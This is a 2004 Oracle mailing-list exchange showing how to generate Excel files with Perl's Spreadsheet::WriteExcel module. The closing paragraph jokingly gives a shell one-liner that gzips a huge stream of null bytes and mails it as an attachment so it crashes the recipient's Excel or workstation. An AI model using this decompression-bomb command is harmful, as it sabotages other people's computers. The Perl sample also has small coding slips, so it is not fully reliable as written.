Re: Help! I need to generate excel files from PL/ SQLm Java api

From: <Jared.Still_at_radisys.com>
Date: Wed, 11 Feb 2004 16:08:09 -0800

This also allows you to do things that SYLK does not support, such as tabbed worksheet creation.
Jared

Mladen Gogala <mladen_at_wangtrading.com>
 02/11/2004 02:11 PM
 Please respond to oracle-l

        To:     oracle-l_at_freelists.org
        cc:
        Subject:        Re: Help! I need to generate excel files from PL/ SQLm Java api

Delphi??? You can get Spreadsheet::WriteExcel from CPAN and do something like this:

#!/usr/bin/perl -w
use strict;
 use Spreadsheet::WriteExcel;

    # Create a new Excel workbook
    my $workbook = Spreadsheet::WriteExcel->new("perl.xls");

    # Add a worksheet
    $worksheet = $workbook->add_worksheet();

    # Add and define a format

    $format = $workbook->add_format(); # Add a format
    $format->set_bold();
    $format->set_color('red');
    $format->set_align('center');

    # Write a formatted and unformatted string, row and column notation.

    $col = $row = 0;
    $worksheet->write($row, $col, "Hi Excel!", $format);
    $worksheet->write(1,    $col, "Hi Excel!");

    # Write a number and a formula using A1 notation     $worksheet->write('A3', 1.2345);
    $worksheet->write('A4', '=SIN(PI()/4)');

Combined with DBI, I can write any spreadsheet I want and have crontab execute and email that for me. The other thing to do to a person who wants
excel spreadsheets would be this:

$PHB=recipient\@company.com
dd if=/dev/zero bs=64k count=65536k|gzip|dd of=/tmp/report.xls.gz uuencode /tmp/report.xls.gz report.xls.gz|mailx -s "My Report" $PHB This would create a 40GB file (consisting of binary nulls) compressed into < 10kb. There is no excel spreadsheet produced by Ms which will not crash
while attemting to open it. If the workstation is NT 4.0, it will get BSOD,
the only application that hasn't changed since the advent of Windows.